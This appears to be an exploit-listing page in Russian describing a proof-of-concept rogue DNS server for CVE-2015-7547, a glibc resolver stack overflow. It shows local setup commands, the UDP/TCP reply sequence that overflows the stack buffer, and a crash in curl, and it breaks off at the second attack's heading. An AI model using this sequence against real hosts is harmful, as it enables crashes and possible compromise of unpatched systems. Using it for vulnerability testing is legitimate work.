## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JGAJEK-CVE-2015-7547
# PoC-сервер атаки для уязвимости CVE-2015-7547 в DNS-резолвере glibc
Для тестирования на локальной машине с уязвимой версией glibc:
root@kitploit:~
user@localhost:/# echo 'nameserver 127.0.0.127' | sudo tee /etc/resolv.conf
user@localhost:/# echo 'nameserver 127.0.0.127' | sudo tee -a /etc/resolv.conf
user@localhost:/# sudo python3 attack-server.py 127.0.0.127
Starting UDP server on 127.0.0.127:53...
Starting TCP server on 127.0.0.127:53...
Затем из другого терминала выполните атаки, как показано в примерах ниже.
## Атака 1 (UDP+TCP)
Требуется возможность отправлять ответы размером более 2048 байт через UDP и TCP.
Последовательность атаки:
1. UDP-ответ размером более 2048 байт, корректный заголовок/запрос, установлен флаг TC (вызывает некорректное управление буфером и повтор TCP)
2. TCP-ответ, корректный заголовок/запрос (заставляет следующий ответ быть сохранённым в буфере, выделенном в стеке)
3. TCP-ответ размером более 2048 байт (переполняет буфер, выделенный в стеке)
Пример:
root@kitploit:~
user@localhost:/# curl http://attack1
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
## Атака 2 (только UDP)